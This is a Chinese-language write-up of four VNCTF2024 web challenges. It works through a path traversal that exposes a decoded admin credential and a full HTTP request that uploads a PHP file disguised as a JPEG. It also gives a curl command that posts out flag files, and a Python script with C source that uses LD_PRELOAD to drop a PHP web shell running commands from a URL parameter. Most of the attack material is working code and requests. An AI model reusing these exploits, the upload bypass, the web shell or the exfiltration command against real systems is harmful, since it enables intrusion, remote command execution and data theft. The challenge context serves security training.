跳转至

VNCTF2024 WriteUp

By V3g3t4ble

CutePath

http://manqiu.top:20912/#/../../../../可以目录遍历

http://manqiu.top:20912/#/../../../..//home/ming

有个base64的文件名,解码是admin:gdgm.edu.cn@M1n9K1n9P@as,登录

重命名/flag/flag/flag.txt../../../../../../../home/ming/share_main/flag.txt

TrySent

https://blog.hanayuzu.top/articles/37dacab4.html

照着抄就行了

POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF
<?php phpinfo();?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

codefever_again

https://www.ctfiot.com/95359.html

real word git

curl带出flag

flag.sh

curl -X POST xxx -d $(cat /f*)

curl下载然后执行,用bash

givenphp

from requests import post, get
import sys
file = {
    "file": open("evil.so", "rb")
}
url = sys.argv[1]
response = post(
    url=url,
    files=file,
    data={"upload": "upload"},
    # proxies={"http":"http://127.0.0.1:8080"}
)
key = "LD_PRELOAD"
value = response.text.split(">")[-1]
# value=""
print("filename:", value)
url=f"{url}?challenge=challenge&key=LD_PRELOAD&value={value}&guess=%00lambda_1"
print("url:",url)
while True:
    response=get(url)
    if response.text.find("www")>0:
        print(response.text)
        break

#include <stdio.h>
#include <stdlib.h>
void _init() {
    FILE *file;
    file = fopen("/var/www/html/shell.php", "w");
    if (file == NULL) {
        printf("无法打开文件\n");
        return;
    }
    fprintf(file, "<?php system($_GET['cmd']);\n");
    fclose(file);
    printf("文件写入成功\n");
}

gcc -fPIC -shared -o evil.so evil.c -nostartfiles